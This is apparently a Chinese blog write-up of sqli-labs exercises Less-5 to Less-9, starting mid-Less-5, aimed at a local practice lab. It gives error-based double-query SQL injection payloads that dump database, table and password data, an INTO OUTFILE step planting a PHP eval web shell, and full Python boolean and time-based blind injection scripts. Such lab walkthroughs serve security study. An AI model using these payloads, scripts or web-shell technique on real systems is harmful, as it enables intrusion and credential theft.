<p>rand():返回随机值</p>
<p>floor():向下舍入为指定的位数</p>
<p>ceiling():向上取证为指定给的位数</p>
<p>Group by:分组</p>
<p>使用二次查询的方式，就是一个select里面再嵌套一个select，如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat((select database()));</span><br><span class="line">+-----------------------------+</span><br><span class="line">| concat((select database())) |</span><br><span class="line">+-----------------------------+</span><br><span class="line">| security                    |</span><br><span class="line">+-----------------------------+</span><br></pre></td></tr></table></figure>

<p>双注的意思是当在一个聚合函数，比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。</p>
<p>利用rand可以返回随机数，加入floor可以返回0或者1。rand(0)会返回固定值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select rand();</span><br><span class="line">+---------------------+</span><br><span class="line">| rand()              |</span><br><span class="line">+---------------------+</span><br><span class="line">| 0.49487676145031745 |</span><br><span class="line">+---------------------+</span><br><span class="line">mysql&gt; select rand(0);</span><br><span class="line">+---------------------+</span><br><span class="line">| rand(0)             |</span><br><span class="line">+---------------------+</span><br><span class="line">| 0.15522042769493574 |</span><br><span class="line">+---------------------+</span><br><span class="line">mysql&gt; select floor(rand(0));</span><br><span class="line">+----------------+</span><br><span class="line">| floor(rand(0)) |</span><br><span class="line">+----------------+</span><br><span class="line">|              0 |</span><br><span class="line">+----------------+</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat(&#x27;~&#x27;,(select database()),&#x27;~&#x27;,floor(rand()*2)) from users;</span><br><span class="line">ERROR:</span><br><span class="line">No query specified</span><br><span class="line">+-----------------------------------------------------+</span><br><span class="line">| concat(&#x27;~&#x27;,(select database()),&#x27;~&#x27;,floor(rand()*2)) |</span><br><span class="line">+-----------------------------------------------------+</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~1                                         |</span><br><span class="line">| ~security~0                                         |</span><br><span class="line">+-----------------------------------------------------+</span><br></pre></td></tr></table></figure>

<p>这样构造可以发现有多少条记录，就返回多少条</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select concat(&#x27;~&#x27;,(select database()),&#x27;~&#x27;,floor(rand()*2))as a from information_schema.tables group by a;</span><br><span class="line">+-------------+</span><br><span class="line">| a           |</span><br><span class="line">+-------------+</span><br><span class="line">| ~security~0 |</span><br><span class="line">| ~security~1 |</span><br><span class="line">+-------------+</span><br></pre></td></tr></table></figure>

<p>再利用gourp by进行分组得到两组。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;</span><br><span class="line">+----------+-----------+</span><br><span class="line">| count(*) | a         |</span><br><span class="line">+----------+-----------+</span><br><span class="line">|      134 | security0 |</span><br><span class="line">|      158 | security1 |</span><br><span class="line">+----------+-----------+</span><br></pre></td></tr></table></figure>

<p>然后注意information_schema.schemata：包含了所有数据库名，就差不多可以开始尝试了。</p>
<p>我自己从hackbar生成一条，返回了<code>Duplicate entry &#39;security~1&#39; for key &#39;&#39;</code></p>
<p>这里用的是派生表报错select 1 from (table name); 这样的语法来报错。</p>
<pre><code>?id=1&#39; AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--+
</code></pre>
<p>然后自己写的是</p>
<pre><code>?id=-1&#39; union all select count(*),0x7e,concat( &#39;~&#39;,(select database() from information_schema.schemata limit 4,1),&#39;~&#39;,floor(rand()*2)) as a from information_schema.schemata group by a --+
</code></pre>
<p>返回<code>Duplicate entry &#39;~security~1&#39; for key &#39;&#39;</code></p>
<p>得到了数据库名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; union all select count(*),0x7e,concat(&#x27;~&#x27;,(select table_name from information_schema.tables where table_schema=&#x27;security&#x27; limit 3,1),&#x27;~&#x27;,floor(rand()*2)) as a from information_schema.schemata group by a--+</span><br></pre></td></tr></table></figure>

<p>返回<code>Duplicate entry &#39;~users~0&#39; for key &#39;&#39;</code></p>
<p>得到了users表</p>
<pre><code>?id=-1&#39; union all select count(*),0x7e,concat( &#39;~&#39;,(select column_name from information_schema.columns where table_name= &#39;users&#39; limit x,1),&#39;~&#39;,floor(rand()*2)) as a from information_schema.schemata group by a --+
</code></pre>
<p>x换成数字得到具体字段</p>
<pre><code>?id=-1&#39; union all select count(*),1,concat( &#39;~&#39;,(select concat(id,username,password) from users limit 2,1),&#39;~&#39;,floor(rand()*2)) as a from information_schema.schemata group by a--+ 
</code></pre>
<p>得到具体的数据。</p>
<h2 id="Less-6-双注入GET双引号字符型注入"><a href="#Less-6-双注入GET双引号字符型注入" class="headerlink" title="Less-6 双注入GET双引号字符型注入"></a>Less-6 双注入GET双引号字符型注入</h2><p>这道题和5类似，就源码中多了<code>&quot;&quot;</code>,只需要修改部分的闭合就可以了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$id = &#x27;&quot;&#x27;.$id.&#x27;&quot;&#x27;;</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</span><br><span class="line">//第六题</span><br></pre></td></tr></table></figure>

<p>只需要把原来的<code>&#39;&#39;</code>改成<code>&quot;&quot;</code>就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&quot; union all select count(*),0x7e,concat( &#x27;~&#x27;,(select database() from information_schema.schemata limit 4,1),&#x27;~&#x27;,floor(rand()*2)) as a from information_schema.schemata group by a --+</span><br></pre></td></tr></table></figure>

<p>返回<code>Duplicate entry &#39;~security~0&#39; for key &#39;&#39;</code></p>
<p>得到数据库名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&quot; union all select count(*),0x7e,concat(&#x27;~&#x27;,(select table_name from information_schema.tables where table_schema=&#x27;security&#x27; limit 3,1),&#x27;~&#x27;,floor(rand()*2)) as a from information_schema.schemata group by a--+</span><br></pre></td></tr></table></figure>

<p>返回<code>Duplicate entry &#39;~users~1&#39; for key &#39;&#39;</code></p>
<p>得到users表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&quot; union all select count(*),0x7e,concat( &#x27;~&#x27;,(select column_name from information_schema.columns where table_name= &#x27;users&#x27; limit x,1),&#x27;~&#x27;,floor(rand()*2)) as a from information_schema.schemata group by a --+</span><br></pre></td></tr></table></figure>

<p>x换成数字得到具体字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&quot; union all select count(*),1,concat( &#x27;~&#x27;,(select concat(id,&#x27;~&#x27;,username,&#x27;~&#x27;,password) from users limit 2,1),&#x27;~&#x27;,floor(rand()*2)) as a from information_schema.schemata group by a--+ </span><br></pre></td></tr></table></figure>

<p>返回<code>Duplicate entry &#39;~3~Dummy~p@ssword~0&#39; for key &#39;&#39;</code></p>
<p>得到一个用户的账号密码。剩下的爆破一下就好了。</p>
<h2 id="Less-7-导出文件GET字符型注入"><a href="#Less-7-导出文件GET字符型注入" class="headerlink" title="Less-7 导出文件GET字符型注入"></a>Less-7 导出文件GET字符型注入</h2><p>这一题和前面是不一样的了，涉及到写入文件了。</p>
<p>查看一下源码，发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$id=$_GET[&#x27;id&#x27;];</span><br><span class="line">//logging the connection parameters to a file for analysis.</span><br><span class="line">$fp=fopen(&#x27;result.txt&#x27;,&#x27;a&#x27;);</span><br><span class="line">....</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=((&#x27;$id&#x27;)) LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>

<p>备注中已经有了提示，同时id也没有过滤，因此我们可以用<code>))</code>绕过</p>
<p>测试一下没反应，同时提示用<code>outfile</code></p>
<p><code>outfile：select &#39;需要写入的内容&#39; out file &#39;文件的绝对路径&#39;</code></p>
<p><code>一句话木马: &lt;?php @eval($_REQUEST[“password”]) ?&gt;</code></p>
<p>我们先验证一下文件的权限可读性</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;)) and (select count(*) from mysql.user)&gt;0--+</span><br></pre></td></tr></table></figure>

<p>发现正常返回</p>
<blockquote>
<p>这里要说一下，我搞这搞了好久，因为马写完了，但是文件一直没出来，因为我一直少了个东西，应该去mysql的默认文件夹下，找到my.ini文件，然后在文件中加入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secure_file_priv=</span><br></pre></td></tr></table></figure>

<p>这句话，然后保存，重启mysql，才能进行操作的。这是赋予了权限。</p>
</blockquote>
<p>先本地试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from security.users into outfile &quot;D:\\phpstudy_pro\\WWW\\1.php&quot;;</span><br><span class="line">Query OK, 13 rows affected (0.00 sec)</span><br></pre></td></tr></table></figure>

<p>返回了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1	Dumb	Dumb</span><br><span class="line">2	Angelina	I-kill-you</span><br><span class="line">3	Dummy	p@ssword</span><br><span class="line">4	secure	crappy</span><br><span class="line">5	stupid	stupidity</span><br><span class="line">6	superman	genious</span><br><span class="line">7	batman	mob!le</span><br><span class="line">8	admin	admin</span><br><span class="line">9	admin1	admin1</span><br><span class="line">10	admin2	admin2</span><br><span class="line">11	admin3	admin3</span><br><span class="line">12	dhakkan	dumbo</span><br><span class="line">14	admin4	admin4</span><br></pre></td></tr></table></figure>

<p>所以大概了解语句怎么用了。</p>
<p>然后用order by判断字段的个数。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;)) order by 4--+</span><br></pre></td></tr></table></figure>

<p>然后进行注入</p>
<p><code>?id=1&#39;)) union select 1,2,&#39;&lt;?php @eval($_post [“password”]);?&gt;&#39; into outfile&#39;D:\\phpstudy_pro\\WWW\\1.php&#39; --+</code></p>
<p>终于成功了，返回了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1	Dumb	Dumb</span><br><span class="line">1	2	&lt;?php @eval($_post [“password”]);?&gt;</span><br></pre></td></tr></table></figure>

<p>然后上菜刀，连接。</p>
<h2 id="Less-8-布尔型单引号GET盲注"><a href="#Less-8-布尔型单引号GET盲注" class="headerlink" title="Less-8 布尔型单引号GET盲注"></a>Less-8 布尔型单引号GET盲注</h2><p>都说了是布尔，然后第五题的时候其实就已经写过了。</p>
<p>然后这题是我第一次试着用脚本写一个sql盲注，写了一晚上，只能说自己太菜了，但是大概理解了一点，脚本写的很烂，代码也很杂乱，可能除了自己也没有人可以看得懂了。太晚了也懒得打备注了。怎么说呢，反正第一次写的，总有意义嘛，还是得记录下来的。虽然借鉴了很多博客，但终究成了自己的东西。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">url = &quot;http://127.0.0.1/sqli-labs-master/Less-8/?id=&quot;</span><br><span class="line"></span><br><span class="line">database_name = &#x27;&#x27;</span><br><span class="line">for database_length in range(1, 10):</span><br><span class="line">    payload = &quot;1&#x27; and length(database())=&quot; + str(database_length) + &quot;--+&quot;</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if &quot;You are in...........&quot; in response.text:  # 得出数据库长度</span><br><span class="line">        for i in range(database_length + 1):  # 按位遍历，+1是为了之后引用在payload里面可以避免丢失一位。</span><br><span class="line">            for j in range(32, 127):  # 遍历表的ascii码</span><br><span class="line">                payload = &quot;1&#x27; and ascii(substr(database(),%d,1))=%d--+&quot; % (i, j)</span><br><span class="line">                response = requests.get(url + payload)</span><br><span class="line">                if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                    database_name += chr(j)</span><br><span class="line">                    print(database_name)</span><br><span class="line">print(&quot;数据库是&quot; + database_name)</span><br><span class="line"></span><br><span class="line">for tables in range(1, 10):</span><br><span class="line">    payload = &quot;1&#x27; and (select count(*) from information_schema.tables where table_schema=database())=%d--+&quot; % tables</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if &quot;You are in...........&quot; in response.text:</span><br><span class="line">        print(tables)</span><br><span class="line">        for i in range(tables):  # 划分不同的表进行遍历</span><br><span class="line">            table_name = &#x27;&#x27;</span><br><span class="line">            for j in range(1,10):</span><br><span class="line">                payload=&quot;1&#x27; and (select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d--+&quot;%(i,j)</span><br><span class="line">                response=requests.get(url+payload)</span><br><span class="line">                if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                    print(&quot;第&quot;+str(i+1)+&quot;个表的长度的为&quot;+str(j)) #先找出每个表长度</span><br><span class="line">                    for a in range(j+1): #找出每个表的每个名字</span><br><span class="line">                        for k in range(32, 127):</span><br><span class="line">                            payload = &quot;1&#x27; and (select ascii(substr(table_name,%d,1)) from information_schema.tables where &quot; \</span><br><span class="line">                              &quot;table_schema=database() limit %d,1)=%d--+&quot; % (a, i, k)</span><br><span class="line">                            response = requests.get(url + payload)</span><br><span class="line">                            if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                                table_name+=chr(k)</span><br><span class="line">                                print(table_name)</span><br><span class="line">                                #到这里我们就可以得到数据库名字和表的名字了，然后就可以根据名字直接找列</span><br><span class="line">for i in range(1,10):# 找到列数</span><br><span class="line">    payload=&quot;1&#x27; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;)=%d--+&quot;%(i)</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if &quot;You are in...........&quot; in response.text:</span><br><span class="line">        print(&quot;表的列数的为&quot; + str(i)) #得到有三个表</span><br><span class="line">        for a in range(i+1):</span><br><span class="line">            column_name=&#x27;&#x27;</span><br><span class="line">            for j in range(1,10): #得到每个表表长</span><br><span class="line">                payload=&quot;1&#x27; and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27; limit %d,1)=%d--+&quot;%(a,j)</span><br><span class="line">                response = requests.get(url + payload)</span><br><span class="line">                if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                    print(&quot;第&quot;+str(a+1)+&quot;个列的长度为&quot;+str(j)) </span><br><span class="line">                    for b in range(j+1):</span><br><span class="line">                        for k in range(32,127): #对每一个表的名字进行爆破</span><br><span class="line">                            payload=&quot;1&#x27; and (select ascii(substr(column_name,%d,1)) from information_schema.columns where table_schema=&#x27;security&#x27; and table_name=&#x27;users&#x27; limit %d,1)=%d--+&quot;%(b,a,k)</span><br><span class="line">                            response = requests.get(url + payload)</span><br><span class="line">                            if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                                column_name += chr(k)</span><br><span class="line">                                print(column_name)</span><br><span class="line">#现在我们有了三个表id,username,password,可以爆破出信息了</span><br><span class="line">username=&#x27;&#x27;</span><br><span class="line">for i in range(2):</span><br><span class="line">    for j in range(10):</span><br><span class="line">        for k in range(32,127): #得到所有的用户名</span><br><span class="line">            payload=&quot;1&#x27; and (select ascii(substr(username,%d,1)) from users limit %d,1)=%d--+&quot;%(j,i,k)</span><br><span class="line">            response = requests.get(url + payload)</span><br><span class="line">            if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                username+=chr(k)</span><br><span class="line">                print(username)</span><br><span class="line">    username+=&#x27;,&#x27;</span><br><span class="line">password=&#x27;&#x27;</span><br><span class="line">for i in range(20):</span><br><span class="line">    for j in range(10):</span><br><span class="line">        for k in range(32,127):#得到所有的密码</span><br><span class="line">            payload=&quot;1&#x27; and (select ascii(substr(password,%d,1)) from users limit %d,1)=%d--+&quot;%(j,i,k)</span><br><span class="line">            response = requests.get(url + payload)</span><br><span class="line">            if &quot;You are in...........&quot; in response.text:</span><br><span class="line">                password+=chr(k)</span><br><span class="line">                print(password)</span><br><span class="line">    password+=&#x27;,&#x27;</span><br></pre></td></tr></table></figure>

<h2 id="Less-9-基于时间的GET单引号盲注"><a href="#Less-9-基于时间的GET单引号盲注" class="headerlink" title="Less-9 基于时间的GET单引号盲注"></a>Less-9 基于时间的GET单引号盲注</h2><p>其实和第八题的思路是一样的都是盲注，但是这题我们可以试试时间盲注</p>
<p>时间盲注需要用到一个if函数和sleep函数</p>
<p><code>if(a,b,c)：表示满足a的时候执行b，不满足执行c</code></p>
<p><code>sleep(x) ：执行延迟x秒</code></p>
<p>我们可以通过在sleep的过程中，发现了延迟，得到了盲注成功的结果</p>
<p><code>if(条件，sleep(0.1),1)</code></p>
<p>然后拿第八题的代码改一下就可以了，如果不嫌浪费时间，sleep时间可以加大，然后相减时间也对应加大，这样误差更小</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line">url = &quot;http://127.0.0.1/sqli-labs-master/Less-9/?id=&quot;</span><br><span class="line"></span><br><span class="line">database_name = &#x27;&#x27;</span><br><span class="line">for database_length in range(1, 10):</span><br><span class="line">    payload = &quot;1&#x27; and if(length(database())=&quot; + str(database_length) + &quot;,sleep(1.5),1)--+&quot;</span><br><span class="line">    t = time.time()  # 开始前时间</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if time.time() - t &gt; 1.4:  # 得出数据库长度</span><br><span class="line">        for i in range(database_length + 1):  # 按位遍历，+1是为了之后引用在payload里面可以避免丢失一位。</span><br><span class="line">            for j in range(32, 127):  # 遍历表的ascii码</span><br><span class="line">                payload = &quot;1&#x27; and if(ascii(substr(database(),%d,1))=%d,sleep(1.5),1)--+&quot; % (i, j)</span><br><span class="line">                t = time.time()</span><br><span class="line">                response = requests.get(url + payload)</span><br><span class="line">                if time.time() - t &gt; 1.4:</span><br><span class="line">                    database_name += chr(j)</span><br><span class="line">                    print(database_name)</span><br><span class="line">print(&quot;数据库是&quot; + database_name)</span><br><span class="line"></span><br><span class="line">for tables in range(1, 10):</span><br><span class="line">    payload = &quot;1&#x27; and if（(select count(*) from information_schema.tables where table_schema=database())=%d，sleep(1.5),1)--+&quot; % tables</span><br><span class="line">    t = time.time()</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if time.time() - t &gt; 1.4:</span><br><span class="line">        print(tables)</span><br><span class="line">        for i in range(tables):  # 划分不同的表进行遍历</span><br><span class="line">            table_name = &#x27;&#x27;</span><br><span class="line">            for j in range(1, 10):</span><br><span class="line">                payload = &quot;1&#x27; and if((select length(table_name) from information_schema.tables where table_schema=database() limit %d,1)=%d,sleep(1.5),1)--+&quot; % (</span><br><span class="line">                i, j)</span><br><span class="line">                t = time.time()</span><br><span class="line">                response = requests.get(url + payload)</span><br><span class="line">                if time.time() - t &gt; 1.4:</span><br><span class="line">                    print(&quot;第&quot; + str(i + 1) + &quot;个表的长度的为&quot; + str(j))  # 先找出每个表长度</span><br><span class="line">                    for a in range(j + 1):  # 找出每个表的每个名字</span><br><span class="line">                        for k in range(32, 127):</span><br><span class="line">                            payload = &quot;1&#x27; and if((select ascii(substr(table_name,%d,1)) from information_schema.tables where &quot; \</span><br><span class="line">                                      &quot;table_schema=database() limit %d,1)=%d,sleep(1.5),1)--+&quot; % (a, i, k)</span><br><span class="line">                            t = time.time()</span><br><span class="line">                            response = requests.get(url + payload)</span><br><span class="line">                            if time.time() - t &gt; 1.4:</span><br><span class="line">                                table_name += chr(k)</span><br><span class="line">                                print(table_name)</span><br><span class="line">                                # 到这里我们就可以得到数据库名字和表的名字了，然后就可以根据名字直接找列</span><br><span class="line">for i in range(1, 10):  # 找到列数</span><br><span class="line">    payload = &quot;1&#x27; and if((select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;)=%d,sleep(1.5),1)--+&quot; % (</span><br><span class="line">        i)</span><br><span class="line">    t = time.time()</span><br><span class="line">    response = requests.get(url + payload)</span><br><span class="line">    if time.time() - t &gt; 1.4:</span><br><span class="line">        print(&quot;表的列数的为&quot; + str(i))  # 得到有三个表</span><br><span class="line">        for a in range(i + 1):</span><br><span class="line">            column_name = &#x27;&#x27;</span><br><span class="line">            for j in range(1, 10):  # 得到每个表表长</span><br><span class="line">                payload = &quot;1&#x27; and if((select length(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27; limit %d,1)=%d,sleep(1.5),1)--+&quot; % (</span><br><span class="line">                a, j)</span><br><span class="line">                t = time.time()</span><br><span class="line">                response = requests.get(url + payload)</span><br><span class="line">                if time.time() - t &gt; 1.4:</span><br><span class="line">                    print(&quot;第&quot; + str(a + 1) + &quot;个列的长度为&quot; + str(j))</span><br><span class="line">                    for b in range(j + 1):</span><br><span class="line">                        for k in range(32, 127):  # 对每一个表的名字进行爆破</span><br><span class="line">                            payload = &quot;1&#x27; and if((select ascii(substr(column_name,%d,1)) from information_schema.columns where table_schema=&#x27;security&#x27; and table_name=&#x27;users&#x27; limit %d,1)=%d,sleep(1.5),1)--+&quot; % (</span><br><span class="line">                            b, a, k)</span><br><span class="line">                            t = time.time()</span><br><span class="line">                            response = requests.get(url + payload)</span><br><span class="line">                            if time.time() - t &gt; 1.4:</span><br><span class="line">                                column_name += chr(k)</span><br><span class="line">                                print(column_name)</span><br><span class="line"># 现在我们有了三个表id,username,password,可以爆破出信息了</span><br><span class="line">username = &#x27;&#x27;</span><br><span class="line">for i in range(3):</span><br><span class="line">    for j in range(10):</span><br><span class="line">        for k in range(32, 127):  # 得到所有的用户名</span><br><span class="line">            payload = &quot;1&#x27; and if((select ascii(substr(username,%d,1)) from users limit %d,1)=%d,sleep(1.5),1)--+&quot; % (j, i, k)</span><br><span class="line">            t=time.time()</span><br><span class="line">            response = requests.get(url + payload)</span><br><span class="line">            if time.time() - t &gt; 1.4:</span><br><span class="line">                username += chr(k)</span><br><span class="line">                print(username)</span><br><span class="line">    username += &#x27;,&#x27;</span><br><span class="line">password = &#x27;&#x27;</span><br><span class="line">for i in range(3):</span><br><span class="line">    for j in range(10):</span><br><span class="line">        for k in range(32, 127):  # 得到所有的密码</span><br><span class="line">            payload = &quot;1&#x27; and if((select ascii(substr(password,%d,1)) from users limit %d,1)=%d,sleep(1.5),1)--+&quot; % (j, i, k)</span><br><span class="line">            t=time.time()</span><br><span class="line">            response = requests.get(url + payload)</span><br><span class="line">            if time.time() - t &gt; 1.4:</span><br><span class="line">                password += chr(k)</span><br><span class="line">                print(password)</span><br><span class="line">    password += &#x27;,&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

